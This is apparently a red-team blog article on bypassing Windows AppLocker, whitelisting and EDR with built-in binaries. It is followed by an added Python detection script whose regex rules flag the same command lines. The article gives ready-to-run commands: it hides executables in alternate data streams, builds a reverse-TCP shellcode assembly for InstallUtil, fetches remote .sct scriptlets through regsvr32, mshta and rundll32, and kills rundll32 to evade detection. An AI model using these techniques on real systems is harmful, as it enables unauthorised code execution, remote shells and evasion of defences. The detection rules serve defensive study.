During a red teaming assessment you may face restrictions imposed by policy enforcement, EDR, application whitelisting and so on. In this article I am going to cover most of the techniques that may be useful for bypassing such environment restrictions.
Abusing writable paths
On some Windows 10 builds there are writable folder paths whose ownership (ACL) can be changed to grant the desired location execute rights as well. If the deny-execute setting on the binary is inherited, you can either disable inheritance or hard link the binary into that location:
fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe
mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe
I also highly recommend checking for folders that are writable at the current permission level using the 0xsp-mongoose -W option.
Bypass Applications Whitelisting
Alternate Data Streams and AppLocker
After AppLocker is installed on a Windows machine, the first user to log in has full access to the following files in the AppLocker directory:
AppCache.dat
AppCache.dat.LOG1
AppCache.dat.LOG2
These files can be abused through alternate data stream execution, since AppLocker locks these files. The steps are:
- add the binary into a stream of one of the files:
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
- call WMIC to create the process from that stream:
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'
You may also consider the following commands, which write or run payloads from alternate data streams with the same attack methodology:
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns
Installutil.exe (T1118)
InstallUtil is a command-line utility that allows installation and uninstallation of resources by executing specific installer components specified in .NET binaries (Citation: MSDN InstallUtil). InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
We can use this tool to generate a C# source file carrying the shellcode, then upload the generated file to the target machine:
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443
Compile the C# code using csc.exe:
csc.exe temp.cs
Finally, execute the compiled assembly with the following command:
.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.exe
Presentationhost.exe (T1218)
PresentationHost.exe is a built-in Windows executable that can be used for proxy execution of code through a XAML Browser Application (XBAP) by loading an .xbap file into a dedicated process. Opening an .xbap file appears to launch the application inside Internet Explorer, but the code actually runs in another process (PresentationHost.exe). For a proof-of-concept demonstration you may use the following code-behind handler:
using System.Diagnostics;
using System.Windows;

// Button handler in the XBAP's code-behind; RadioButton1 is the radio button declared in the XAML
private void Button_click(object sender, RoutedEventArgs e)
{
    if (RadioButton1.IsChecked == true)
    {
        Process.Start("C:\\poc\\evil.exe");
        MessageBox.Show("Hello.");
    }
}
Then launch it with the following command:
Presentationhost.exe file:///tmp/poc.xbap
Also bear in mind that if it does not work because of security validation, it is better to build and deploy it through Visual Studio; you can check out this article for details.
Regsvcs.exe / Regasm (T1121)
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.
This attack can be demonstrated by executing the following commands:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
You may also achieve the same with Regsvcs using the following PowerShell commands, which first write out the strong-name key used to sign the assembly:
$key = '<base64-encoded contents of key.snk, removed>'
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
Mshta.exe (T1170)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).
This utility can be used to launch several kinds of attacks that bypass the restrictions placed on an environment; the first common one uses a scriptlet (.sct) file.
First, create the scriptlet payload:
<?XML version="1.0"?>
<scriptlet>
  <registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
  <public>
    <method name="Exec"></method>
  </public>
  <script language="JScript"></script>
</scriptlet>
Save it as payload.sct, for example; after that you can call it through the mshta process:
mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();
Rundll32
As is well known, rundll32 can be used in several ways. The first command loads a DLL from a standard UNC path; here we use rundll32 to execute a payload stored on a WebDAV server:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
The second approach calls an inline script, again using the payload.sct we used before:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
We can also consider this trickier payload, which executes a process and then kills the rundll32.exe process once execution has finished; that is very helpful for avoiding detection in some cases:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
On the other hand, we can still use rundll32 to bypass the restriction by creating a process through the exported entry points of registered system DLLs:
rundll32.exe advpack.dll,RegisterOCX calc.exe
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll, FileProtocolHandler calc.exe
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
rundll32.exe ieadvpack.dll,LaunchINFSection test.i
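Defensive counterpart to the ADS, InstallUtil, Regsvcs/Regasm, Mshta and Rundll32 sections above: an added Python example (not from the original article or from 0xsp) that runs command-line detection rules over constructed process-creation telemetry. The rule names, the SAMPLE_EVENTS records and the alert format are my own assumptions; the flagged command lines are taken from the article, with two benign ones added as negatives.

```python
import re

# Command-line detection rules for the living-off-the-land patterns the article
# walks through. Each is a case-insensitive regex over the full process command
# line as recorded by Sysmon Event ID 1 or Windows Security event 4688.
RULES = {
    # rundll32 running inline JScript through mshtml,RunHTMLApplication
    "rundll32_inline_script": re.compile(r"\brundll32(\.exe)?\b.*\bjavascript:", re.I),
    # rundll32 loading a DLL from a UNC (e.g. WebDAV) path
    "rundll32_unc_dll": re.compile(r"\brundll32(\.exe)?\s+\\\\[^\s\\]+\\", re.I),
    # rundll32 calling the system DLL exports listed in the article
    "rundll32_known_export": re.compile(
        r"\brundll32(\.exe)?\s+(advpack|zipfldr|url|ieframe|ieadvpack)\.dll,\s*"
        r"(RegisterOCX|RouteTheCall|OpenURL|FileProtocolHandler|LaunchINFSection)\b", re.I),
    # mshta given an inline javascript:/vbscript:/script: URI instead of an .hta file
    "mshta_inline_script": re.compile(r"\bmshta(\.exe)?\b.*\b(javascript|vbscript|script):", re.I),
    # regsvr32 pulling a remote .sct scriptlet through scrobj.dll
    "regsvr32_remote_scriptlet": re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\.dll", re.I),
    # InstallUtil /U still runs the assembly's Uninstall method
    "installutil_uninstall_exec": re.compile(r"\binstallutil(\.exe)?\b.*(/U\b|/uninstall)", re.I),
    # regasm/regsvcs: broad on purpose, baseline it against legitimate .NET installs
    "regasm_regsvcs_exec": re.compile(r"\b(regasm|regsvcs)(\.exe)?\b", re.I),
    # a drive path whose last component names an NTFS alternate data stream
    "ads_path_in_cmdline": re.compile(
        r"[A-Za-z]:\\[^\s:\"']+:[^\s:\\\"']+\.(exe|dll|bat|hta)\b", re.I),
}

def match_rules(cmdline):
    """Return the sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (image, rule) pairs for each event dict {'image', 'cmdline'} that trips a rule."""
    return [(ev["image"], rule) for ev in events for rule in match_rules(ev["cmdline"])]

# Constructed sample telemetry: three command lines from the article and two benign ones.
SAMPLE_EVENTS = [
    {"image": "wmic.exe", "cmdline": r"wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'"},
    {"image": "mshta.exe", "cmdline": 'mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();'},
    {"image": "rundll32.exe", "cmdline": r"rundll32.exe url.dll, FileProtocolHandler calc.exe"},
    {"image": "svchost.exe", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"image": "rundll32.exe", "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

if __name__ == "__main__":
    for image, rule in scan(SAMPLE_EVENTS):
        print(f"ALERT {rule:<28} {image}")
```

The regasm/regsvcs rule is intentionally coarse and will fire on legitimate software installs, so pair it with a parent-process or installation-window baseline before alerting on it.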
Offensive security expert and founder of 0xsp security research and development (SRD); passionate about hacking and breaking stuff; coder and maintainer of 0xsp-mongoose RED and many other open-source projects.